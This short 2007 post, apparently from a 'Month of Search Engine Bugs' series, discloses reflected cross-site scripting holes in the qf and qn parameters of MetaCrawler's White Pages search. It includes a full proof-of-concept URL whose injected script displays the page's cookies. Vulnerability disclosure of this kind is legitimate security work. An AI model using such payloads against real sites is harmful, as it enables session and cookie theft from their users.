MOSEB-13: Vulnerabilities at metacrawler.com
22:41 13.06.2007Next participant of the project is MetaCrawler search engine. It is one of the popular meta search engines.
The vulnerabilities are at MetaCrawler (www.metacrawler.com) in White Pages search. These Cross-Site Scripting holes I found 27.05.2007.
XSS:
The vulnerabilities are in qf and qn parameters:
http://www.metacrawler.com/info.metac/white-pages/message.htm?otmpl=/white-pages/results.htm&qf=%3Cscript%3Ealert(document.cookie)%3C/script%3E&searchtype=citystate
Moral: searching in white pages can be dangerous.
Note, that MetaCrawler engine belongs to InfoSpace, Inc. So they also responsible for these vulnerabilities. And don’t worry guys, InfoSpace will also be in MOSEB.